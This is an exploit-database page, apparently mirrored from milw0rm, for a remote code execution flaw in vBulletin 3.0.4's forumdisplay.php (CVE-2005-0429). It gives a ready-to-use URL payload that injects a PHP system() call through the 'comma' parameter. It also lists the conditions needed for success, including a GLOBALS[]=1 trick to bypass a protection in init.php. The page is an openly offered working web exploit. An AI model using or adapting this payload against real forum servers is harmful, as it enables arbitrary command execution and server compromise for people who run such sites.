[] NeoSense
E X P L O I T S
title author type platform port cve id

vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (1)

Author: AL3NDALEEB
type: webapps
platform: php
port: 
date_added: 2005-02-13 
date_updated:  
verified: 1 
codes: OSVDB-14026;CVE-2005-0429 
tags: 
aliases:  
screenshot_url:  
application_url: 
Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

Conditions:
----------------
1st condition     : $vboptions['showforumusers'] == True , the admin must set
		    showforumusers ON in vbulletin options.

2nd condition     : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.

3rd condition     : $DB_site->fetch_array($forumusers) == True , when you
		    visit the forums, it  must has at least one user show the forum.

4th condition     : magic_quotes_gpc must be OFF

SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
		    init.php by secret array GLOBALS[]=1 ;)))

# milw0rm.com [2005-02-14]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.